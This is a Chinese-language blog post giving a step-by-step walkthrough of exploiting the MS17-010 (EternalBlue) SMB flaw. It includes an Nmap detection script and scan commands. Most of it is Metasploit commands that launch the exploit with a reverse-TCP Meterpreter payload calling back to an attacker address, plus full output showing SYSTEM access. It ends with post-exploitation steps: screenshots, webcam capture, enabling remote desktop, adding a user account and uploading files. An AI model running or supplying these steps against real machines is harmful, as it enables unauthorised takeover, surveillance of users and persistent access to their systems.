MS 17010

---
title: MS017-010漏洞利用笔记
date: 2018-08-15 11:14:55
tags:
- Kali渗透测试
- 精品好文
categories: Kali渗透测试
---

<img src="/Picture/页首图片/Kali_TiQuan.jpg" alt="Kali" />

在NSA工具箱刚刚放出来的时候，大家都在学习怎么玩转这个工具箱中的“永恒之蓝”的攻击，相信每个小伙伴学习的使用的时，都很不适应并很是花费了一番周折才搞定它吧，而且每次使用还要准备好相应的条件，今天就跟大家分享下我们刚刚学习到利用MSF框架快速搞定“MS017-010”漏洞。

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击，就是利用Metasploit中近期更新的针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

<escape><!-- more --></escape>

<h3> 扫描开启445端口,并且具有漏洞的主机.</h3>

a.新建文件 smb-vuln-ms17-010.nse 的文件,写入以下内容：

```Code
local nmap = require "nmap"
local smb = require "smb"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

description = [[
Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code
execution vulnerability (ms17-010, a.k.a. EternalBlue).
The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the $IPC tree, executes a transaction on FID 0 and
checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to
determine if the target is not patched against ms17-010. Additionally it checks
for known error codes returned by patched systems.

Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

References:
* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
* https://msdn.microsoft.com/en-us/library/ee441489.aspx
* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010
]]

---
-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>
-- @usage nmap -p445 --script vuln <target>
--
-- @see smb-double-pulsar-backdoor.nse
--
-- @output
-- Host script results:
-- | smb-vuln-ms17-010:
-- | VULNERABLE:
-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2017-0143
-- | Risk factor: HIGH
-- | A critical remote code execution vulnerability exists in Microsoft SMBv1
-- | servers (ms17-010).
-- |
-- | Disclosure date: 2017-03-14
-- | References:
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
--
-- @xmloutput
-- <table key="CVE-2017-0143">
-- <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="ids">
-- <elem>CVE:CVE-2017-0143</elem>
-- </table>
-- <table key="description">
-- <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="month">03</elem>
-- <elem key="year">2017</elem>
-- <elem key="day">14</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2017-03-14</elem>
-- <table key="refs">
-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>
-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>
-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>
-- </table>
-- </table>
--
-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$
---

author = "Paulino Calderon <paulino()calderonpale.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

hostrule = function(host)
return smb.get_port(host) ~= nil
end

local function check_ms17010(host, port, sharename)
local status, smbstate = smb.start_ex(host, true, true, "\\\\".. host.ip .. "\\" .. sharename, nil, nil, nil)
if not status then
stdnse.debug1("Could not connect to '%s'", sharename)
return false, string.format("Could not connect to '%s'", sharename)
else
local overrides = {}
local smb_header, smb_params, smb_cmd

stdnse.debug1("Connected to share '%s'", sharename)

overrides['parameters_length'] = 0x10

--SMB_COM_TRANSACTION opcode is 0x25
smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)
smb_params = string.pack(">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2",
0x0, -- Total Parameter count (2 bytes)
0x0, -- Total Data count (2 bytes)
0xFFFF, -- Max Parameter count (2 bytes)
0xFFFF, -- Max Data count (2 bytes)
0x0, -- Max setup Count (1 byte)
0x0, -- Reserved (1 byte)
0x0, -- Flags (2 bytes)
0x0, -- Timeout (4 bytes)
0x0, -- Reserved (2 bytes)
0x0, -- ParameterCount (2 bytes)
0x4a00, -- ParameterOffset (2 bytes)
0x0, -- DataCount (2 bytes)
0x4a00, -- DataOffset (2 bytes)
0x02, -- SetupCount (1 byte)
0x0, -- Reserved (1 byte)
0x2300, -- PeekNamedPipe opcode
0x0, --
0x0700, -- BCC (Length of "\PIPE\")
0x5c50, -- \P
0x4950, -- IP
0x455c -- E\
)
stdnse.debug2("SMB: Sending SMB_COM_TRANSACTION")
local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)
if(result == false) then
stdnse.debug1("There was an error in the SMB_COM_TRANSACTION request")
return false, err
end

local result, smb_header, _, _ = smb.smb_read(smbstate)
if not result then
stdnse.debug1("Error reading SMB response: %s", smb_header)
-- error can happen if an (H)IPS resets the connection
return false, smb_header
end

local _ , smb_cmd, err = string.unpack("<c4 B I4", smb_header)
if smb_cmd == 37 then -- SMB command for Trans is 0x25
stdnse.debug1("Valid SMB_COM_TRANSACTION response received")

--STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched
if err == 0xc0000205 then
stdnse.debug1("STATUS_INSUFF_SERVER_RESOURCES response received")
return true
elseif err == 0xc0000022 then
stdnse.debug1("STATUS_ACCESS_DENIED response received. This system is likely patched.")
return false, "This system is patched."
elseif err == 0xc0000008 then
stdnse.debug1("STATUS_INVALID_HANDLE response received. This system is likely patched.")
return false, "This system is patched."
end
stdnse.debug1("Error code received:%s", stdnse.tohex(err))
else
stdnse.debug1("Received invalid command id.")
return false, string.format("Unexpected SMB response:%s", stdnse.tohex(err))
end
end
end

action = function(host,port)
local vuln_status, err
local vuln = {
title = "Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)",
IDS = {CVE = 'CVE-2017-0143'},
risk_factor = "HIGH",
description = [[
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).
]],
references = {
'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',
'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'
},
dates = {
disclosure = {year = '2017', month = '03', day = '14'},
}
}
local sharename = stdnse.get_script_args(SCRIPT_NAME .. ".sharename") or "IPC$"
local report = vulns.Report:new(SCRIPT_NAME, host, port)
vuln.state = vulns.STATE.NOT_VULN

vuln_status, err = check_ms17010(host, port, sharename)
if vuln_status then
stdnse.debug1("This host is missing the patch for ms17-010!")
vuln.state = vulns.STATE.VULN
else
vuln.state = vulns.STATE.NOT_VULN
vuln.check_results = err
end
return report:make_output(vuln)
end
```

b.使用Nmap扫描漏洞.

MS17-101漏洞定向扫描命令如下：

```Code
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
```

c.使用 MSF Auxiliary 辅助扫描

其实如果不直接使用namp进行漏洞定向扫描，我们也可以直接使用MSF框架的辅助模块“”auxiliary”中的扫描模块进行扫描。了解MSF的同学肯定都知道，MSF的扫描模块基本也就是调用nmap扫描来实现的。这里就简单记录下这个“auxiliary/scanner/”扫描模块的下漏洞扫描方法。

```Code
msfconsole # 进入MSF框架

search smb_ms17_010 #查找漏洞模块的具体路径
use auxiliary/scanner/smb/smb_ms17_010 #调用漏洞扫描模块
show option #查看模块配置选项
set RHOST 192.168.1.1-254 #配置扫描目标
set THREADS 30 #配置扫描线程
run #运行脚本
```

<br>

<h3> MSF框架直接发起攻击.</h3>

```Code
msfconsole #进入MSF 框架
version #确保MSF框架版本在 4.14.17以上

search ms17_010 #漏洞模块路径查询
set exploit/windows/smb/ms17_010_eternalblue #调用攻击模块
set RHOST 192.168.1.112 #设定攻击目标
exploit #发起攻击
```

<h3> MSF后渗透.维持访问</h3>

payload 攻击载荷理论

说到这里就就普及下MSF框架下关于“payload”攻击载荷的基本概念，那么什么是payload呢？
payload又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，并返回一个shell，也可以进行程序注入等，payload有3种类型。

（1）singles（独立载荷）
独立载荷，可直接植入目标系统并执行相应的程序，如：shell_bind_tcp这个payload。

（2）stagers（传输器载荷）
传输器载荷，就是用于目标机与攻击机之间建立稳定的网络连接，与传stages（输体载荷配）合攻击。通常该种载荷体积都非常小，可以在漏洞利用后，方便进行注入，这类载荷功能都非常相似，大致分为bind型和reverse型。

bind型：需要攻击机主动连接目标端口的；
reverse型：目标机会反向连接攻击机，需要提前设定好连接攻击机的ip地址和端口号的配置。

（3）stages（传输体）
传输体载荷，如shell，meterpreter等。在stagers建立好稳定的连接后，攻击机将stages传输给目标机，由stagers进行相应处理，将控制权转交给stages。比如得到目标机的shell，或者meterpreter控制程序运行。这样攻击机可以在本端输入相应命令控制目标机。
由此可见，meterpreter其实就是一个payload，它需要stagers（传输器）和相应的stages（传输体）配合运行，meterpreter是运行在内存中的，通过注入dll文件实现，在目标机硬盘上不会留下文件痕迹，所以在被入侵时很难找到。真因为这点，所以meterpreter非常可靠稳定优秀。
6.2 payload 攻击载荷理解

上面说了这么多，可能大家看起来比较费劲难以理解，其实简单的理解就是说payload攻击载荷有2个大的类型：

（1） 独立体（single）
从这个英文单词single,就可以大概知道这类payload是个独立，单独的意思，其实在结合定义我们就可以看出，攻击载荷一般做两件事情
一、就是建立目标主机与攻击主机之间的网络连接；
二、就是在连接建立的基础上获取目标主机的控制权限，即获取可供操作的shell。

（2）结合体payload
在理解了一个完整的payload是有两部分组成的基础上，我们可以理解我们这里所说的结合体了，其实就是将原本的single独立体分割为了两个部分：“传输器载荷”与“传输体载荷”（stages & stagers）
比如“windows/meterpreter/reverse_tcp”是由一个传输器载荷（reverse_tcp）和一个传输体载荷（meterpreter）所组成的，其功能等价于独立攻击载荷“windows/shell_reverse_tcp”
6.3 meterpreter 攻击载荷实战

我们这里就使用MS17-010漏洞渗透模块结合meterpreter攻击载荷模块进行一次实战演练,通过永恒之蓝漏洞我们来获取一个meterpreter，顺道看meterpreter功能的强大之处。
其他攻击流程与前面基本相同，唯独多了一个配置 payload攻击载荷的过程，具体配置如下。

```Code
1.msf > use exploit/windows/smb/ms17_010_eternalblue # 调用ms17-010永恒之蓝漏洞攻击模块

2.msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.112 # 设定攻击目标 192.168.1.112
3.rhost => 192.168.1.112

4.msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 调用反弹的攻击载荷
5.payload => windows/x64/meterpreter/reverse_tcp

6.msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.118 # 设定将meterpreter 反弹给192.168.1.118
7.lhost => 192.168.1.118

8.msf exploit(ms17_010_eternalblue) > show options # 查询攻击参数设置
9.
10.Module options (exploit/windows/smb/ms17_010_eternalblue):
11.
12. Name Current Setting Required Description
13. ---- --------------- -------- -----------
14. GroomAllocations 12 yes Initial number of times to groom the kernel pool.
15. GroomDelta 5 yes The amount to increase the groom count by per try.
16. MaxExploitAttempts 3 yes The number of times to retry the exploit.
17. ProcessName spoolsv.exe yes Process to inject payload into.
18. RHOST 192.168.1.112 yes The target address
19. RPORT 445 yes The target port (TCP)
20. VerifyArch true yes Check if remote architecture matches exploit Target.
21. VerifyTarget true yes Check if remote OS matches exploit Target.
22.
23.
24.Payload options (windows/x64/meterpreter/reverse_tcp):
25.
26. Name Current Setting Required Description
27. ---- --------------- -------- -----------
28. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
29. LHOST 192.168.1.118 yes The listen address
30. LPORT 4444 yes The listen port
31.
32.
33.Exploit target:
34.
35. Id Name
36. -- ----
37. 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
38.
39.

40.msf exploit(ms17_010_eternalblue) > exploit # 发起攻击
41.
42.[*] Started reverse TCP handler on 192.168.1.118:4444
43.[*] 192.168.1.112:445 - Connecting to target for exploitation.
44.[+] 192.168.1.112:445 - Connection established for exploitation.
45.[+] 192.168.1.112:445 - Target OS selected valid for OS indicated by SMB reply
46.[*] 192.168.1.112:445 - CORE raw buffer dump (23 bytes)
47.[*] 192.168.1.112:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
48.[*] 192.168.1.112:445 - 0x00000010 74 65 20 36 2e 31 00 te 6.1
49.[+] 192.168.1.112:445 - Target arch selected valid for OS indicated by DCE/RPC reply
50.[*] 192.168.1.112:445 - Trying exploit with 12 Groom Allocations.
51.[*] 192.168.1.112:445 - Sending all but last fragment of exploit packet
52.[*] 192.168.1.112:445 - Starting non-paged pool grooming
53.[+] 192.168.1.112:445 - Sending SMBv2 buffers
54.[+] 192.168.1.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
55.[*] 192.168.1.112:445 - Sending final SMBv2 buffers.
56.[*] 192.168.1.112:445 - Sending last fragment of exploit packet!
57.[*] 192.168.1.112:445 - Receiving response from exploit packet
58.[+] 192.168.1.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
59.[*] 192.168.1.112:445 - Sending egg to corrupted connection.
60.[*] 192.168.1.112:445 - Triggering free of corrupted buffer.
61.[*] Sending stage (1189423 bytes) to 192.168.1.112
62.[*] Meterpreter session 1 opened (192.168.1.118:4444 -> 192.168.1.112:49177) at 2017-06-07 13:42:17 +0800
63.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
64.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
65.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
66.

67.meterpreter > getuid # 查询当前用户权限为SYSTEM,获取到到最高权限
68.Server username: NT AUTHORITY\SYSTEM
69.meterpreter > sysinfo #当前系统为 Windows7
70.Computer : CHINAMAN-PC
71.OS : Windows 7 (Build 7600).
72.Architecture : x64
73.System Language : zh_CN
74.Domain : WORKGROUP
75.Logged On Users : 0
76.Meterpreter : x64/windows
77.meterpreter >

```

上图我们得到了一个Shell，可以对目标主机进行的操作有。

getuid # 获取到到最高权限

sysinfo # 系统信息查询

screenshot #抓图

webcam_snap #视频开启

run post/windows/manage/enable_rdp #开启远程桌面

直接进入系统shell,添加账号 shell ; net user test 123 /add

upload c:/a.exe a.exe #上传文件